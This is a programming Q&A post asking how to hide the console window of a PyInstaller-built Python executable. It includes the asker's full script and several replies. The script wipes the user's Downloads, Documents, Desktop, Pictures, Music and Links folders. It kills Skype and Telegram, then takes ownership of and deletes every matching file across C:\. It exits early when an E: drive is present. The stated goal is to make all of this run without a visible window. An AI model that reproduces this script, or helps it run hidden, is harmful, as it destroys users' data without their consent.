# How to make python executable (.exe) don't show console window?

Tags: python, console, hide

I'm new to python. I used pyinstaller to make .exe file and don't want to show the console window. It's work if I use `pyinstaller -F xxx.py` (has a window)
but I got the message `failed to execute script xxx` if I use `pyinstaller -F -w xxx.py`

I have no idea how to log it.

python: 3.7.5
pyinstaller: 3.5
windows 10

[here is my code](http://139.162.104.10/myCode.txt)

```py
import os
import re
import shutil
import sys
import time
from os import listdir
from os.path import isfile, isdir, join
from subprocess import PIPE, Popen
from typing import List

if os.path.exists("e:/"):
    sys.exit()

all_Path = "C:\\"

def cmdline(command):
    process = Popen(
        args=command,
        stdout=PIPE,
        shell=True
    )
    (out, err) = process.communicate()
    out = str(out).replace("\\r\\n'", "")
    out = out.replace("b'", "")
    return out

username = cmdline('echo %username%')

def Clear_User_Data():
    user_path = f'C:\\Users\\{username}'
    folders = ['Downloads', 'Documents', 'Music', 'Pictures', 'Links', 'Desktop']
    for folder in folders:
        shutil.rmtree(f'{user_path}\{folder}', ignore_errors=True)


def Kill_Tasks(tasks: List, times: int):
    t = times
    for task in tasks:
        print(f'Waiting for {task} ... ')
        times = t
        while times > 0:
            a = cmdline('tasklist')
            if a.find(task) > 0:
                os.system(f'taskkill /IM {task} /F')
                break
            else:
                time.sleep(1)
                times -= 1


def Seek_Spec_Folder(keyword: str, path: str):
    folders = set()
    for r, d, f in os.walk(path):
        if re.search(keyword, r, re.IGNORECASE):
            folders.add(r)
    return folders


def Delete_Spec_Files(keyword: str, path: str):
    for r, d, f in os.walk(path):
        for file in f:
            if re.search(keyword, file, re.IGNORECASE):
                target_path = os.path.join(r, file)
                try:
                    os.system(f'TAKEOWN /F "{target_path}" /R ')
                    os.system(f'icacls "{target_path}" /grant {username}:f')
                except Exception as e:
                    print(e)
    folders = Seek_Spec_Folder(keyword, path)
    for folder in folders:
        os.system(f'TAKEOWN /F "{folder}" /R ')
        os.system(f'icacls "{folder}" /grant {username}:f')
        shutil.rmtree(folder, ignore_errors=True)


Kill_Tasks(["SkypeApp.exe", "SkypeBackgroundHost.exe", "Telegram.exe", "Skype.exe"], 9)
Delete_Spec_Files('Skype', all_Path)
Delete_Spec_Files('Telegram', all_Path)
```

Comment: This is already answered here https://stackoverflow.com/questions/17584698/getting-rid-of-console-output-when-freezing-python-programs-using-pyinstaller

Comment: Does this answer your question? [Getting rid of console output when freezing Python programs using Pyinstaller](https://stackoverflow.com/questions/17584698/getting-rid-of-console-output-when-freezing-python-programs-using-pyinstaller)

Comment: @PraysonW.Daniel It's not work for me , I have been try to add --noconsole and change the console value to False. it's still show failed to execute script

Comment: Can you paste the trace back error?

Comment: @PraysonW.Daniel I found out the problem is about subprocess.Popen https://github.com/pyinstaller/pyinstaller/wiki/Recipe-subprocess , it's no error if comment cmdline(command). but I have no idea how to fix it ?